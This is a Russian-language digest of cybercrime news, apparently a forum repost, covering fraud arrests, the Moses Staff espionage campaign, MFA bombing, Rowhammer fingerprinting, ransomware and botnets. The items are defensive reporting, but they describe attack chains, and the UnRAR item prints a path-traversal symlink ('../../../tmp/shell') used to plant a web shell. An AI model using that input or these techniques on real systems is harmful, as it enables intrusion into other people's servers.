Букхаут подчеркивает, что их исследование проводилось с использованием исторических данных и не нарушало конфиденциальность текущих пользователей даркнет-рынков.
nature.com/articles/s41598-024-67115-5
Следователи Следственного департамента МВД России и оперативники ФСБ России задержали пятерых участников организованной группы. В ее состав входили жители нескольких регионов. Они подозреваются в содействии телефонным мошенникам, которые вели противоправную деятельность из-за пределов нашей страны.
«Предварительно установлено, что международная криминальная схема функционировала с 2022 года. Злоумышленники обеспечивали работу специального оборудования, которое позволяло подменять номера звонивших из-за рубежа аферистов на российские. Мошенники представлялись сотрудниками финансовых учреждений и правоохранительных органов, после чего убеждали россиян перевести сбережения и кредитные средства на так называемые безопасные счета.
Click to expand...
По местам жительства участников организованной группы и в используемых ими офисных помещениях на территории Москвы, Санкт-Петербурга, Ярославля, Сочи, Московской и Ленинградской областей проведены обыски. Полицейскими обнаружено и изъято серверное оборудование, средства связи, устройства по агрегации сим- карт, ноутбуки, значительное количество денежных средств в рублях и иностранной валюте, автомобили премиум-класса, документация и другие предметы, имеющие доказательственное значение», – сообщила официальный представитель МВД России Ирина Волк.
Сотрудниками Следственного департамента МВД России задержанным предъявлено обвинение в преступлении, предусмотренном частью 4 статьи 159 УК РФ. Им избрана мера пресечения в виде заключения под стражу.
«Следователи и оперативники продолжают мероприятия, направленные на установление всех эпизодов и соучастников противоправной деятельности», – добавила Ирина Волк.
Click to expand...
Следственным отделом ОМВД России по Лабинскому району завершено расследование уголовного дела, возбужденного в отношении 54-летней жительницы Волгоградской области по признакам преступления, предусмотренного частью 4 статьи 159 УК РФ «Мошенничество».
По данным следствия, обвиняемая, вступив в преступный сговор с неустановленными лицами в сети Интернет, уголовное дело в отношении которых выделено в отдельное производство, получила подработку обнальщиком. Злоумышленница оформила на свое имя банковскую карту и передала данные счета сообщникам. Аферисты позвонили потерпевшему и предложили инвестировать деньги в известную энергетическую компанию, обещая высокий доход от вложений. Затем звонившие убедили мужчину перевести более 4,5 млн рублей на указанный ему банковский счет. Получив денежные средства, обвиняемая обналичила их в банкомате. Взяв себе 2% от похищенной суммы, женщина передала деньги мошенникам.
В настоящее время материалы уголовного дела с утвержденным обвинительным заключением направлены в суд для рассмотрения по существу. Санкции инкриминируемой статьи предусматривают максимальное наказание в виде лишения свободы на срок до десяти лет.
Компания Apple сдалась: на iOS добавят возможность устанавливать сторонние приложения.
— для Европы релиз в марте вместе с iOS 17.4;
— Все магазины должны пройти проверку Apple, а потом их можно будет качать с сайта. Приложения внутри магазинов уже не модерируются Apple;
— Сторонние магазины не будут платить комиссию Apple;
— В AppStore наконец разрешили приложения стриминга игр: GeForce Now, Xbox Cloud и так далее.
Группировка Moses Staff месяцами атаковала израильские организации
Группировка эксплуатировала уязвимости ProxyShell в серверах Microsoft Exchange в качестве начального вектора заражения.
Иранская хакерская группировка под названием Moses Staff использовала многокомпонентный набор инструментов для осуществления шпионажа за израильскими организациями.
Как сообщили ИБ-специалисты из компании FortiGuard Labs, в ходе своей вредоносной кампании группировка эксплуатировала уязвимости ProxyShell в серверах Microsoft Exchange в качестве начального вектора заражения для установки двух web-оболочек с последующим хищением файлов данных Microsoft Outlook (.PST).
Последующие этапы атаки включают попытку кражи учетных данных путем сброса содержимого памяти критического процесса Windows Local Security Authority Subsystem Service (Lsass.exe), затем происходит установка бэкдора StrifeWater (broker.exe).
Установка имплантата для выполнения удаленных команд от командного сервера, загрузки файлов и хищения данных облегчается загрузчиком, который маскируется под «службу быстрой остановки жестких дисков», получившую название DriveGuard (drvguard.exe).
Кроме того, загрузчик также отвечает за запуск защитного механизма (lic.dll), который гарантирует непрерывность работы службы путем перезапуска DriveGuard каждый раз, когда процесс останавливается.
Бэкдор может удалять себя с диска с помощью команды CMD, делать снимки экрана и обновлять вредоносное ПО, чтобы заменить текущий модуль в системе файлом, полученным с сервера.
StrifeWater также известен своими возможностями обходить защитные шлюзы, выдавая себя за приложение Windows Calculator (calc.exe).
Вредоносная кампания была связана с группировкой Moses Staff на основе сходства web-оболочек, используемых в ранее зафиксированных атаках.
Мошенничество в блокчейне постепенно выходит на глобальный уровень.
Четыре гражданина США недавно были обвинены в участии в мошеннической схеме, благодаря которой они заработали более 80 миллионов долларов на инвестиционных аферах с использованием криптовалюты. Среди обвиняемых — Лу Чжан, Джастин Уокер и Джозеф Вонг из Калифорнии, а также Хайлонг Чжу из Иллинойса.
Министерство юстиции США (DoJ), объявившее об арестах Чжана и Уокера, сообщило, что подозреваемые в своё время открыли фиктивные компании и банковские счета для осуществления афер, переводя незаконно полученные средства в отечественные и международные финансовые учреждения. В случае признания вины, Чжан и Уокер могут получить до 20 лет тюремного заключения. Их предполагаемые соучастники до сих пор на свободе.
DoJ уточнило, что в ходе расследования было установлено более 284 транзакций, в результате которых жертвы потеряли свыше 80 миллионов долларов, причём более 20 миллионов были напрямую переведены на счета обвиняемых.
Ранее в этом месяце Езе Харрисон Аринзе, гражданин Нигерии, был приговорён к трём годам тюремного заключения за участие в аналогичных аферах, в результате которых 34 жертвы из 13 стран понесли убытки в размере 592 тысячи долларов.
В конце прошлого месяца DoJ также объявило о конфискации почти 9 миллионов долларов в криптовалюте Tether, принадлежащих организации из Юго-Восточной Азии, обманувшей более 70 жертв.
Аферы методом «Pig Butchering», согласно специальному докладу Trend Micro, относятся к категории романтических финансовых мошенничеств, при которых злоумышленники находят своих жертв на сайтах знакомств, а затем завлекают в свою инвестиционную аферу, обещая максимально высокую прибыль в короткие сроки.
В то же время, по данным центра жалоб на интернет-преступления при ФБР, в 2022 году потери от криптовалютных инвестиционных афер достигли 2,57 миллиарда долларов, что на 183% больше по сравнению с 2021 годом.
Большинство номеров телефонов, использованных в подобных аферах, прослеживаются по утечкам баз данных с личной информацией, что указывает на возможное использование мошенниками утекшей информации для поиска следующих жертв.
Криптовалютные мошенничества становятся всё более распространённой и изощрённой угрозой. Хотя жертвами чаще становятся жители США и других развитых стран, эта проблема носит глобальный характер, затрагивая людей в десятках разных государств.
Рост числа пострадавших и размеров ущерба свидетельствует о необходимости международного сотрудничества для эффективного противодействия этому виду киберпреступности. Компетентным органам и финансовым регуляторам предстоит принять скоординированные меры на законодательном и правоприменительном уровнях для защиты граждан и наведения порядка на рынке криптовалют.
Следствием УВД по ЗАО ГУ МВД России по г. Москве завершено расследование уголовного дела о сбыте поддельной иностранной валюты, фигурантом которого стал 25-летний приезжий мужчина.
Предварительно установлено, что обвиняемый приобрёл множество ненастоящих денежных купюр номиналом по 100 долларов США каждая, после чего разместил в сети Интернет объявление об их продаже за российские рубли по цене ниже рыночной. На предложение откликнулись два человека, один из которых заплатил за 50 фальшивых банкнот 451 тысячу рублей, а другой отдал злоумышленнику свыше 1,5 млн рублей за большее количество поддельной иностранной валюты.
В дальнейшем после поступления сообщений о мошенничествах фигурант был установлен и задержан в одном из магазинов на улице Лобачевского сотрудниками отдела экономической безопасности и противодействия коррупции и отдельного батальона патрульно-постовой службы полиции УВД по ЗАО ГУ МВД России по г. Москве.
В ходе личного досмотра у обвиняемого были обнаружены и изъяты ещё 100 купюр номиналом по 100 долларов США каждая. По способу печати реквизитов и защитных элементов они не соответствуют образцам аналогичной типографской печатной продукции и являются поддельными.
В настоящее время уголовное дело, возбуждённое по признакам преступления, предусмотренного частью 3 статьи 186 Уголовного кодекса Российской Федерации, вместе с обвинительным заключением направлено в Никулинский районный суд для рассмотрения по существу. Фигурант находится под стражей.
Банда орудовала преимущественно в провинции Кастилия-и-Леон. Злоумышленников удалось задержать в ходе операции региональных правоохранительных структур.
Работники испанской Гражданской гвардии провели операцию, в ходе которой арестовали трех человек за интернет-мошенничество.
Из-за действий злоумышленников пострадали порядка 150 тыс. пользователей. В общей сложности жертвы лишились около восьми миллионов евро.
Об этом накануне, 21 марта, информирует министерство внутренних дел королевства в своем пресс-релизе.
«По оценкам агентов, в общей сложности пострадали 150 тыс. человек, у которых эта организация смогла обманным путем выманить сумму, близкую к 8 млн евро», — указывается в сообщении ведомства.
Согласно представленным данным, в период пандемии мошенники разработали сайт, который имитировал официальные учреждения. В частности, на нем предлагались административные услуги, которые обычно предоставляются на бесплатной основе.
Так, речь идет, например, о выдаче свидетельств о регистрации, уголовных преступлениях, а также трудовой деятельности, картах здоровья и других услугах. При этом за каждую их них злоумышленники требовали от 19 до 89 евро.
После ряда обысков в Вальдеморо и Вальядолиде полиция изъяла примерно 1 млн евро у 35 предприятий, которые задействовались мошенниками с целью отмывания полученных денежных средств.
Среди прочего, в настоящее время МВД королевства проводит расследование против еще 12 человек из-за фактов макро-мошенничества через онлайн-платформы.
MFABombing: фишинговая атака лишает доступа к Apple аккаунту
Пользователи
Apple столкнулись с хитроумной схемой фишинга, эксплуатирующей уязвимость в
функции сброса пароля. Жертвы атаки обнаруживают, что их устройства получают
настолько большое количество системных уведомлений, что смартфон становится
невозможно использовать без реагирования на каждое уведомление.
Целью мошенников является получение одноразового кода сброса Apple ID для
блокировки доступа жертвы к аккаунту и удаленного стирания данных.
Атака известна как MFA Bombing и злоупотребляет системой многофакторной
аутентификации, вызывая поток уведомлений на устройство жертвы.
Чем обернётся внедрение жёстких мер цифрового надзора?
В недавнем докладе Счётной палаты США (GAO) утверждается, что многие игровые компании тесно сотрудничают с ФБР и Министерством внутренней безопасности США для выявления контента, связанного с внутренним насильственным экстремизмом.
В докладе отдельно отмечается, что механизмы выявления экстремизма, например, в социальных сетях — существуют уже давно, и аналогичные процессы прямо сейчас активно разрабатываются и для игровой индустрии.
Основной упор в докладе GAO сделан на необходимость разработки общей стратегии для эффективного взаимодействия ФБР и Министерства внутренней безопасности (DHS) с игровыми компаниями, чтобы их действия были максимально эффективны и полностью законны. DHS уже согласилось с рекомендацией GAO и обещает разработать необходимую стратегию к 28 июня текущего года.
Отчёт также раскрывает давление Конгресса на крупные игровые компании с целью усиления борьбы с экстремистским контентом. Так, в марте прошлого года председатель Сенатского юридического комитета Дик Дурбин направил письма в Valve, Activision Blizzard, Epic Games, Riot Games, Roblox Corp и Take-Two Interactive с требованием принять меры в отношении внедрения контроля за поведением и социальным взаимодействием геймеров.
Как стало известно из того же отчёта, определённая система сообщений об экстремистской деятельности существует в США уже сейчас, и крупные игровые компании стараются информировать ФБР о явных случаях нарушения американского законодательства.
Тем не менее, GAO подчёркивает, что пока у ФБР и DHS всё-таки отсутствует единая всеобъемлющая стратегия, позволяющая привести работу с игровыми компаниями в соответствие с более широкими задачами агентства.
В текущем виде деятельность американских правительственных агентств вызывает вопросы у некоторых медийных личностей. Так, например, Хасан Пайкер, популярный стример на платформе Twitch, отметил, что, когда дело доходит до выявления экстремизма, ФБР гораздо чаще нацеливаются на уязвимых подростков с психическими отклонениями , нежели на реальных преступников.
Федеральное правительство уделяет особое внимание борьбе с экстремизмом после штурма американского Капитолия 6 января 2021 года. Президент Джо Байден в свой первый день на посту президента даже поручил своей команде провести всесторонний обзор федеральных усилий по борьбе с внутренним терроризмом, который Белый дом счёл «самой неотложной террористической угрозой, стоящей перед Соединёнными Штатами».
Результатом директивы Байдена стала первая в истории национальная стратегия борьбы с внутренним терроризмом, включающая, помимо прочего, платформы онлайн- игр — как место, где происходит вербовка и мобилизация людей для участия в подобного рода деятельности.
Отмечается, что федеральные агентства активно сосредотачивают внимание на игровой индустрии как на канале для радикализации и общения экстремистов. Так, внутренняя разведывательная оценка ФБР и Министерства внутренней безопасности за 2019 год предупреждала о возможности использования популярных онлайн- игровых платформ экстремистами.
Важной частью работы является обеспечение баланса между борьбой с экстремизмом и защитой конституционных прав граждан на свободу слова. С учётом текущих судебных разбирательств по этому вопросу, жертвой системы вполне могут стать люди, которым нужна психологическая помощь, а не обвинительное заключение и тюремный срок.
Крайне важно, чтобы правоохранительные органы действовали в рамках закона, руководствуясь чёткими критериями и прозрачной стратегией при взаимодействии с игровыми компаниями. В противном случае, борьба с экстремизмом рискует обернуться ущемлением демократических ценностей.
sc:
gao.gov/products/gao-24-106262
judiciary.senate.gov/imo/media/doc/2023-03-28%20RJD%20to%20DOJ%20re%20briefing%20on%20extremism%20in%20online%20games.pdf
theintercept.com/2023/07/31/fbi-isis-sting-mentally-ill-teen/
В Новосибирске у бизнесмена украли $2 млн из двухуровневой квартиры. Причем кражу он обнаружил не сразу, так как вор заменил настоящие купюры на фальшивку, а сейф, где они хранились, никто не взламывал.
Сейф предприниматель хранил под кроватью, в нем лежали необходимые для бизнеса средства. Кража совершилась, когда его не было дома – на несколько дней мужчина вместе с супругой уехал в Санкт-Петербург. Вернувшись, он осмотрел сейф, и подумал, что все в порядке.
«Однако, когда бизнесмен стал рассматривать [деньги], понял, что купюры были фальшивые, – рассказал изданию источник. – Увидел подделку и был в полном шоке от этого».
Родственники заверили пострадавшего, что не прикасались к тайнику, после этого он обратился в полицию. Несмотря на то, что уголовное дело уже возбудили, остается вероятность, что это кто-то неудачно пошутил, так как полиция не зафиксировала взломов дверей, окон, а ключ от сейфа хранился в доме.
В данный момент проводится расследование, подтвердили изданию в пресс-службе регионального ГУ МВД России.
«Лаборатория Касперского» выявила новый способ мошенничества с помощью программ удаленного доступа. Злоумышленники маскируют вредоносные ПО под банковские приложения, распространяют через мессенджеры и пытаются получить контроль над устройствами, работающими на операционной системе Android.
«Еще в прошлом году, судя по отзывам на Google Play, чтобы вынудить жертву найти в магазине и скачать определенную программу для удаленного доступа, злоумышленники изобретали самые разные приемы. Например, ссылались на то, что приложение переименовали якобы из-за санкций, поэтому оно не имеет ничего общего с тем или иным банком. Пытались запугать тем, что только с этим приложением данные будут в безопасности или что оно необходимо, чтобы никакое другое устройство не могло подключиться к личному кабинету клиента. Встречались и другие поводы: якобы на пользователя пытались оформить кредит, и чтобы отменить операцию, нужно воспользоваться ПО службы поддержки банка. Не исключаем, что похожие легенды могли использоваться злоумышленниками, когда они начали распространять уже модифицированные версии программ для удаленного доступа», — рассказал Дмитрий Калинин из «Лаборатории Касперского».
По информации экспертов, за последние 11 дней были предотвращены около сотни подобных атак.
«Атакующие копируют легитимные приложения для удаленного доступа, одно из которых также есть в Google Play, но намеренно вводят людей в заблуждение, модифицируя их. Они меняют само название программ и иконки, добавляют наименование и визуал нужного банка, а также надписи в некоторых текстовых полях. Легитимные приложения представляют собой программы с открытым исходным кодом, поэтому для злоумышленников не составило особого труда создать на их основе поддельные приложения», — добавил Калинин.
Согласно объяснению от «Лаборатории», преступники сначала обращаются к людям под видом службы поддержки банка. Затем жертву убеждают скачать фальшивое «приложение поддержки», которое отправляется в виде установочного файла. Если пользователь устанавливает этот файл, мошенникам остается только получить необходимую информацию для удаленного доступа к смартфону. Контроль над устройством позволяет войти в настоящий банковский аккаунт и беспрепятственно похитить средства.
Таким образом уже были похищены огромные суммы. По данным Центробанка России, в первом квартале 2023 года социальная инженерия, под которую подпадает этот метод, составляла 50,5% от всех случаев хищений. Преступники украли посредством несанкционированных переводов 4,5 млрд рублей, из которых банки смогли вернуть всего 860 млн.
Интересно, что популярность метода увеличилась после того, как некоторые крупные приложения были удалены из магазинов App Store и Google Play из-за санкций. Хакеры не могли не воспользоваться неудобством, которое испытывали клиенты банков.
«В 2022 году мошенники стали активно использовать для хищения денег социальные сети и мобильные приложения», — подтвердили в ЦБ. В период с 28 февраля по 31 декабря 2022 года Центробанк инициировал блокировку 1942 страниц в социальных сетях «ВКонтакте» и «Одноклассники» и 23 мобильных приложений в App Store, Google Play и других магазинах.
Ученые из Калифорнийского университета в Дейвисе предложили использовать Rowhammer-атаку для создания уникальных «отпечатков пальцев» устройств, даже если это устройства одного производителя, с идентичными аппаратными и программными характеристиками. Созданную для этой цели атаку специалисты назвали Centauri.
Rowhammer
Оригинальную атаку [Rowhammer](http://users.ece.cmu.edu/~yoonguk/papers/kim- isca14.pdf) еще в 2014 году придумали эксперты из университета Карнеги- Меллона. Ее суть сводилась к тому, что определенное воздействие на ячейки памяти может привести к тому, что электромагнитное излучение повлияет на соседние ячейки, и значения битов в них изменятся.
За прошедшие с тех пор годы исследователи успели доказать, что перед атаками Rowhammer может быть уязвима самая разная память, а также атаку научились эксплуатировать через JavaScript, успели приспособить ее для атак на Microsoft Edge и виртуальные машины Linux. Также существует вариация Rowhammer, представляющая опасность для устройств на Android, а эффективность атак научились повышать при помощи видеокарт.
В ответ на это производители внедрили в свои продукты Target Row Refresh (TRR) — комбинацию различных программных и аппаратных исправлений, созданных за прошедшие годы. В основном эти механизмы были эффективны и их хватало для защиты тогда еще новой памяти DDR4.
Однако представленная в 2021 году атака Blacksmith, основанная на фаззинге, доказала, что Rowhammer-атаки даже на современную память возможны и позволяют обойти защитные механизмы.
Click to expand...
Обычно фингерпринтинг устройств включает в себя составление списка характеристик ПО и железа для конкретного девайса. Считается, что каждая из этих характеристик (например, разрешение экрана) представляет собой один бит энтропии. Имея достаточно битов энтропии, можно получить значение, которое, скорее всего, будет уникальным в рамках определенного набора и будет работать как уникальный идентификатор устройства.
Авторы Centauri пишут, что то же самое можно распространить и на память: проверка памяти с помощью атаки Rowhammer поможет выявить характеристики ОЗУ, которые затем можно использовать для фингерпринтинга железа. Исследователи подчеркивают, что при выполнении атак Rowhammer реакция ОЗУ и распределение битов, которые переворачиваются, будут уникальны для памяти каждого компьютера.
«Согласно нашему анализу, проверка Centauri на 98 модулях DIMM в шести наборах идентичных модулей DRAM от двух производителей показала, что [этот метод] может извлекать высокоэнтропийные и стабильные “отпечатки пальцев” с общей точностью 99,91%», — пишут исследователи.
Click to expand...
При этом атака достигает точности 99,91% примерно за три минуты. Более быстрой фингерпринтинг так же возможен, но за счет некоторой потери точности. Так, Centauri может извлечь «отпечаток пальца» всего за 9,92 секунды, и при этом точность ухудшится всего на 0,64.
Ученые рассказывают, что преодолели ряд проблем, разрабатывая Centauri. В частности, им пришлось понять, как справляться с недетерминированными (непредсказуемыми) переворотами битов в различных участках памяти; с ограничениями на распределение памяти, чтобы обеспечить повторный доступ к одним и тем же участкам; как реализовать известные методы обхода TRR.
Стоит отметить, что в текущем виде Centauri предполагает запуск кода на компьютере пользователя, но исследователи считают, что в будущем атаку удастся адаптировать для работы в веб-приложении в браузере.
Одним из возможных применений такого фингерпринтинга исследователи считают обнаружение мошенничества, например, выявление ботов. То есть компьютер, который пытается притвориться несколькими машинами одновременно, будет обнаружен по уникальному отпечатку.
Однако эксперты признают, что применение Centauri сопряжено с определенными рисками для добропорядочных пользователей. Дело в том, что «Centauri может случайно вывести из строя устройство пользователя, перевернув бит, зарезервированный для ОС» (отмечается, что такие случаи редки), а также приводит к ускоренному изнашиванию модулей памяти, если используется постоянно.
Чтобы избежать подобных проблем, ученые предлагают поставщикам ОС гарантировать, что память, выделенная для операционной системы, физически не соседствует с памятью, зарезервированной для других приложений. А также использовать Centauri не постоянно, а только для «критических случаев».
Дипломаты должны покинуть страну в течение 24 часов из-за вмешательства хакеров в работу государственных сервисов
Албания разорвала дипломатические отношения с Ираном и дала 24 часа на то, чтобы сотрудники иранского посольства покинули столицу страны Тирану. Об этом, как пишет Reuters, заявил 7 сентября албанский премьер-министр Эди Рама.
Глава Албании заявил, что Иран пытался осуществить кибератаку в отношении государственных сервисов 15 июля, обвиняя исламскую республику в намерении украсть государственные данные.
«Правительство приняло решение немедленно разорвать дипломатические отношения с Исламской Республикой Иран. Этот ответ полностью пропорционален серьезности и риску кибератаки, которая угрожала парализовать государственные службы, взломать цифровые системы, раскрыть государственные записи, украсть электронные сообщения правительственной внутренней сети, вызвать хаос и поставить безопасность в стране под угрозу», – сказал премьер-министр Албании.
«Углубленное расследование предоставило нам неоспоримые доказательства того, что кибератака против нашей страны была организована и спонсирована Исламской Республикой Иран через участие четырех групп, которые осуществили агрессию», — объяснил Рама.
Позицию Албании поддержали США, которые осудили Иран «за этот беспрецедентный кибер-инцидент».
source:
reuters.com/world/albania-cuts-iran-ties-orders-diplomats-go-after-cyber-
attack-pm-says-2022-09-07
albaniandailynews.com/news/white-house-reacts-on-iran-s-cyberattack-against-
albania
Слеш в пути файла позволил злоумышленнику проникнуть в систему.
В утилите UnRAR компании RARlab была обнаружена уязвимость, которая может позволить удаленному злоумышленнику выполнить произвольный код в системе, использующей двоичный файл. Также в пакете для совместной работы Zimbra уязвимость может привести к удаленному выполнению кода и предоставить полный доступ к серверу электронной почты.
Уязвимость обхода пути в версиях UnRAR для Unix CVE-2022-30333 может активироваться при извлечении вредоносного RAR-архива. После раскрытия ошибки 4 мая 2022 года недостаток был устранен RARlab 6 мая в версии 6.12 . «Злоумышленник может создавать файлы за пределами целевого каталога извлечения, когда жертва разархивирует файлы», — заявил исследователь SonarSource Саймон Сканнелл.
Вредоносный RAR-архив содержит символическую ссылку в виде прямой или обратной косой черты (например, «..\. .\. .\tmp/ shell»), чтобы обойти проверку и извлечь архив за пределы целевого каталога.
Уязвимость позволяет киберпреступнику преобразовать обратную косую черту «\» в прямую «/», чтобы RAR-архив, созданный в Windows, можно было извлечь в Unix- системе, изменяя символическую ссылку в пути файла «../. ./. ./tmp/shell». Злоумышленник может записывать произвольные файлы в любом месте файловой системы, а также создавать JSP-оболочку в каталоге Zimbra и выполнять вредоносные команды.
«Единственным требованием для этой атаки является наличие UnRAR на сервере. В большинстве случаев утилита уже установлена на сервера, поскольку она необходима для сканирования архива на наличие вирусов и проверки на спам», — отметил Сканнелл.
source: blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day
Вымогательская атака на Swissport International привела к задержке авиарейсов
На данный момент неясно, о каком именно вымогательском ПО идет речь.
Швейцарская компания Swissport, обслуживающая аэропорты в 50 странах мира, сообщила об атаке с использованием вымогательского ПО, которая нарушила работу ее IT-инфраструктуры и сервисов, что привело к задержке рейсов в некоторых аэропортах.
Согласно сообщению компании в Twitter, распространение вымогательского ПО удалось сдержать. Работа сервисов уже восстановлена. По словам представителя аэропорта Цюриха - одного из клиентов Swissport, - кибератака началась ранним утром четверга и вызвала небольшие задержки (от 3 до 20 минут) более двух десятков рейсов.
На данный момент подробностей об атаке известно немного. В частности неясно, о каком именно вымогательском ПО идет речь, и удалось ли хакерам похитить данные компании.
За последнюю неделю это уже третий инцидент, вызвавший сбои в работе предприятий критической инфраструктуры. В начале февраля вымогатели парализовали работу нефтебаз немецких нефтяных компаний Oiltanking и Mabanaft, а несколько дней спустя кибератаке подвеглись нефтяные терминалы в ряде крупнейших европейских портов.
В ноябре украинские суды вынесли 195 приговоров по уголовным делам, связанным с интернет-преступностью. Это на 43% больше, чем в октябре и на 45% больше, чем за аналогичный период прошлого года.
Данные собраны в Едином реестре судебных решений и отображают статистику приговоров, вынесенных украинской судебной системой по преступлениям, связанным с интернетом. Среди них – заказ поддельных документов (ст. 358 УК), интернет-мошенничество (ст. 190), покупка и распространение наркотических веществ (ст. 307, 309), несанкционированное вмешательство в работу компьютерных систем (ст. 361) и нарушения против общественной морали (ст. 301).
Единственным видом правонарушения, приговоров по которому в ноябре было вынесено меньше, чем в предыдущем месяце – это преступления, связанные с интернет-порно (-16%). Остальные статьи показали серьезный рост «осуждаемости».
Наибольший рост динамики, в сравнении с предыдущим месяцем, показали преступления, связанные с интернет-мошенничеством (+137%), наркотиками (+47,9%), а также подделкой документов (+43,2%). А вот приговоров за вмешательство в работу компьютерных систем стало больше всего лишь на 25%.
Так, в ноябре были наказаны 53 гражданина, купившие через интернет поддельные документы. Из них – 31 человек купили водительские права, 14 – сертификаты международного образца о вакцинации против COVID-19. Поддельные сертификаты составили 26% от общего количества нарушений по статье 358 УКУ, тогда как в предыдущем месяце их доля была всего лишь 20%.
По фактам мошенничество в интернете, в ноябре были вынесены 19 приговоров. 7 из них – это ОЛХ-мошенники, которые брали предоплату за несуществующие товары, а также аренду жилья. Еще 4 приговора связаны с похожими схемами на других ресурсах, включая Facebook, Instagram и newauction.com.ua.
Отдельного упоминания заслуживают недобросовестные покупатели, похищавшие интернет-заказы на Новой Почте (2 эпизода), завладением доступа к чужим банковским аккаунтам (2 эпизода) и фейковым трудоустройством за границей через Facebook.
За интернет-преступления, связанные с наркотиками, было вынесено 108 приговоров: 27 из них получили торговцы, 81 – покупатели.
За взлом компьютерных систем были осуждены 5 человек. Двое из них производили вмешательство в системы учета бонусных баллов сети АЗС, еще двое продавали данные учетных записей от различных интернет-сервисов и фотокопии документов граждан Украины.
Что касается преступлений против общественной морали, которых в ноябре было осуждено на 16% меньше - 4 из них связаны с хранением и распространением детской порнографии, 2 – с растлением несовершеннолетних через соцсети. 1 приговор вынесен администратору порно-сайта, еще 2 – производителям «взрослого» контента, причем, в одном из этих эпизодов осуждены сразу 7 организаторов и участников порно-студии.
Общая динамика приговоров интернет-преступникам в 2021 году выглядит так:
По данным китайской ИБ-компании Qihoo 360, авторы объявившегося в июле Linux- зловреда с функциональностью червя постоянно его совершенствуют. В настоящее время Abcbot, как его именуют эксперты, умеет обновлять себя, использовать генератор доменов (DGA) для связи с C2, настраивать веб-сервер и проводить DDoS-атаки.
Первоначально вредонос представлял собой простенький сканер для проведения атак на серверы подбором паролей или через эксплойт уязвимостей. Используемые с этой целью шелл-скрипты подробно разобрали в прошлом месяце эксперты Trend Micro.
На тот момент Abcbot выступал в роли угонщика чужих мощностей, взламывая серверы в облаках для добычи криптовалюты. Эти атаки были примечательны тем, что зловред прибивал при этом штатные процессы, связанные с мониторингом и выявлением проблем безопасности, а также сбрасывал пароли к аккаунтам Elastic Cloud.
Анализ новейшей (шестой по счету) версии Abcbot показал, что он по-прежнему собирает и отсылает на С2-сервер информацию о зараженной системе, а также проводит сканирование портов в поисках других уязвимых Linux-машин. Кроме этого, зловред запускает на зараженном устройстве веб-сервер и ожидает команд (порт 26800) на проведение DDoS-атак.
Первоначальный вариант реализации DDoS-функциональности в Abcbot был многоступенчатым: бот каждый раз загружал с удаленного сервера исходный код руткита ATK, модифицировал его и перенаправлял полученную команду этому модулю.
В конце прошлого месяца зловред обрел собственный, кастомный компонент для проведения DDoS-атак, который поддерживает следующие техники:
tls Attack
tcp Attack
udp Attack
ace Attack
hulk Attack
httpGet Attack
goldenEye Attack
slowloris Attack
bandwidthDrain Attack
Размеры ботнета, созданного на основе Abcbot, пока невелики. По данным Qihoo 360, в настоящее время он охватывает 260 хостов (IP-адресов).
Щербинский районный суд Москвы приговорил во вторник руководителя "Агентства кибербезопасности" Евгения Лифшица к четырем годам шести месяцам колонии за покушение на мошенничество.
"Суд признал 37-летнего жителя столицы виновным в покушении на мошенничество и приговорил его к четырем годам шести месяцам лишения свободы в исправительной колонии общего режима, со штрафом в размере 800 тыс. рублей", - сообщила ТАСС руководитель пресс-службы столичной прокуратуры Людмила Нефедова, не уточнив фамилию подсудимого. В правоохранительных органах отметили, что речь идет о руководителе "Агентства кибербезопасности" Евгении Лифшице.
Установлено, что подсудимый, получив из неустановленного источника сведения о возбуждении органами внутренних дел уголовного дела в отношении столичного предпринимателя, предъявлении ему обвинения в ограничении конкуренции и избрании ему меры пресечения в виде домашнего ареста, решил использовать данное обстоятельство для личного обогащения. В ходе личных встреч с сыном предпринимателя он убеждал в наличии у него обширных коррупционных связей среди руководителей правоохранительных органов. Мужчина обещал за $3 млн оказать влияние на ход и результаты расследования, минимизировав ответственность обвиняемого по уголовному делу. "В действительности денежные средства он намеревался похитить", - сообщила Нефедова.
22 августа 2020 года Лифшиц получил от потерпевшего, действовавшего в рамках оперативно-разыскных мероприятий, денежные средства и их муляжи на общую сумму $1 млн, после чего был задержан. "Свою вину в совершении преступления он признал в полном объеме", - сказала Нефедова.
Лифшиц неоднократно выступал в ток-шоу "Время покажет" на Первом канале и давал интервью другим СМИ. В декабре 2019 года он выступил с инициативой ужесточения ответственности за комментарии в интернете. При этом, по его мнению, ответственность должен нести именно автор комментария, а не площадка, где он размещен.
Согласно информации, размещенной на сайте "Агентства кибербезопасности", компания занимается информированием общественности о главных событиях в сфере IТ-безопасности.
Злоумышленники входили в доверие к людям и выманивали у них денежные средства.
Об этом сообщает РЕДПОСТ со ссылкой на пресс-службу Национальной полиции Харьковской области.
Отмечается, что в сентябре текущего года правоохранители получили информацию о незаконной деятельности граждан, которые выдавали себя за сотрудников финансовых учреждений, совершали звонки клиентам и, входя в доверие, получали персональные данные.
При помощи полученной информации мошенники через банковские мобильные приложения получали доступ к управлению банковским счетом потерпевших.
7 декабря 2021 года полицейские провели 5 санкционированных обысков по адресам, где находились офисы злоумышленников. По результатам обысков была изъята компьютерная техника, теневая документация, мобильные телефоны, сим- карты и банковские карты.
Кроме этого, были установлены личности 13 работников колл-центра, с которыми проводятся следственные действия.
На основании принятых мер трем организаторам преступной схемы сообщили о подозрении согласно части 3 статьи 190 Уголовного кодекса Украины. Санкция статьи предусматривает до 8 лет лишения свободы, досудебное расследование продолжается.
Microsoft заявила, что ей удалось установить контроль над рядом веб-сайтов, которые использовались поддерживаемой, предположительно, правительством Китая хакерской группой для атак на организации в 29 странах, включая США.
Подразделение по борьбе с цифровыми преступлениями Microsoft (DCI) сообщило, что федеральный суд в Вирджинии издал приказ, позволяющий компании взять под свой контроль веб-сайты и перенаправить трафик на серверы Microsoft. По данным компании, вредоносные сайты использовались спонсируемой государством хакерской группой, известной как Nickel, или APT15, для сбора разведданных от государственных органов, аналитических центров и правозащитных организаций.
Microsoft, которая отслеживает Nickel с 2016 года и ранее описывала ее как одну из «самых активных» хакерских групп, нацеленных на государственные учреждения, заявила, что наблюдала «очень сложные» атаки, которые устанавливали трудно обнаруживаемое вредоносное ПО. В некоторых случаях, согласно данным компании, в атаках использовались скомпрометированные сторонние поставщики виртуальной частной сети (VPN) и учетные данные, полученные в результате целевых фишинговых кампаний, а в других сценариях для проникновения в сети компаний использовались уязвимости в сервере Microsoft Exchange и системе SharePoint.
